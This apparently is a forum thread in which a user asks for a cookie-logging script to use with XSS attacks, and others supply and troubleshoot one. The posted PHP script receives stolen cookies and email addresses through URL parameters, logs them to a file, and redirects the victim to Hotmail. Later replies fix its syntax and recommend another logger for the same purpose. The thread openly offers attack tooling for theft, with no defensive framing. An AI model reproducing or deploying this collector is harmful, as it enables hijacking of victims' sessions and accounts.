Hiya guys have googled and found some examples but I want to keep the logs private.

I need a cookie logging script for use with xss attacks, php is preffered but cgi is good too. (not perl though). Thanks in advance !!

<?php
$file="youpasswordlog.log";
if (isset($HTTP_GET_VARS["cookie"]) && isset($HTTP_GET_VARS["email"]){

$logcookie = $HTTP_GET_VARS["cookie"];
$logcookie = rawurldecode($logcookie); //turns url encoding to normal
text
$logemail = $HTTP_GET_VARS["email"];
$logemail = rawurldecode($logemail); //turns url encoding to normal text

$handle=fopen($file, "r+"); //Opening the file in read only
$filecontence=fread($handle,filesize("$file"));
fclose($handle);

$handle=fopen($file, "w"); //Opening the file for writing
fwrite($handle, "$logemail - $logcookie\n $filecontence\n ");
//Writing email address and cookie then the rest of the log
fclose($handle);
}
header("Location: http://www.hotmail.com");
?>

Thanks for your reply, but this doesnt seem to work. I get an error on line 5 (fixed the one on line 3).

yeh the " text " in line 7 belongs to the comment in line 6, for multiline comments u need /* */

here is the working code for the lazy ones:

can this be written in javascript?

No, it cannot be written in javascript. For the most part, this is used to catch those XSS attacks that send *to* your cookie catcher.

i use optix notifie phplogger
works fine with xxs
and its password protect



cheers